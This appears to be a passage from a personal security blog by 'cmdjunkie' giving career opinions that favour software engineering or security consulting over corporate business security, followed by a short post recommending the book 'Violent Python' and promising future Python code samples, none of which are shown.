So for the aspiring security professional I would really give it some thought as to what you think you’re getting into.  Do you want to get in as a non-technical analyst, perform some risk assessments and work your way up the corporate ladder, ultimately winding up in an executive security position?  Do you want to learn how to “haxx computers”?  Are you getting into the industry because all you’re seeing these days are computer security positions?  Or are you really just a programmer that wants some more excitement and increased responsibility?  Whatever your true intentions, please realize that you will be fighting an army of men and women who will sit around for hours, upon days, upon months, just to come up with effective ways to break into your network, and you’ll likely have no way to prevent it.  You’ll spend the majority of your time putting in third-party systems that you hope will bring you some peace of mind, only to get owned by a crafty South American cracker that was targeting cute and susceptible, security ignorant Ashley, over there in Marketing.  There is no way to stop the coming storm.  There is nothing you can do.

If you’re just into technology and you want to work on computers, why not just become a programmer?  It’s actually obvious… it’s because most people don’t have the capacity to be a good programmer.  Most can’t fathom the thought of sitting at a console for 8+ hours, pecking away at source code, trying to hammer out a solution.  I tell you what, it’s a better alternative than driving yourself crazy with the thought of the cyber-boogieman getting access and lurking through your network, stealing your company’s intellectual property and making off with it, only to blame you for your negligence.

I have techno-lust.  I love computers, programming, security, games, operating systems and just cool shit that can be done with software.  It’s what I’m good at, and the more I hone my programming abilities, the more I want to pursue software engineering rather than security.  Security, more specifically business security, has absolutely nothing to do with technology.  It’s about policy, control and people.  If you want to work on security systems and really do cool security work, you either work for a SOC (eh), or go to graduate school for computer security research.  Do not be fooled by the promise of exciting work and catching digital bad guys.  It’s hardly the reality of the security industry.

In conclusion, computer science/software engineering is the way to go in my humble opinion if you’re like me. If you’re creative, inventive and logical, try some programming, you might enjoy it and find your calling.  To me it’s a philosophical thing.  I’m an idealist and I find absolute euphoria in creating something that originated in the confines of my consciousness.

To those MBAs, or recent college grads who just want a good, decent-paying job right out of college: go get your CISSP and put your resume out there.  You’re the ones the businesses need.  You’re the ones who don’t code, who aren’t technical and wouldn’t be caught writing a script if they had a gun to their head.  Businesses need you and your CISSPy attitudes.  Businesses need those schmucks to talk it up in meetings and explain risk ratings to security-naive executives.

For those hackers out there who want to make money doing what they love: DO NOT pursue a position in security (business security).  You will be absolutely miserable, forced to perform tasks that are mind-numbingly boring compared to what you want to do.  Get out there and go get that coveted CEH, OSCP, GPEN, etc., and then go find a security consulting company that can take you under its wing and teach you the ropes.  Stay away from the businesses.  They think they need you, but they don’t.


Violent Python for the Win
cmdjunkie
If you haven't picked up TJ O'Connor's new book Violent Python, I certainly recommend it.  IMHO, it's the best book on what I like to call Security Software Engineering (see the earlier post for a more detailed definition).  Anyway, the book has some great examples of how to do specific security-related tasks using Python.  The examples are clean and easy to understand, which means they leave a lot to the practitioner to get creative with the code; and that's where I come in.  I'll be posting code samples from my learnings and sharing them, adding some commentary and a Network Attack Abstract (NAA) with the standard ITPE (Interface/Requirement, Tools, Procedure, Exercises) for fun.  Cheers.
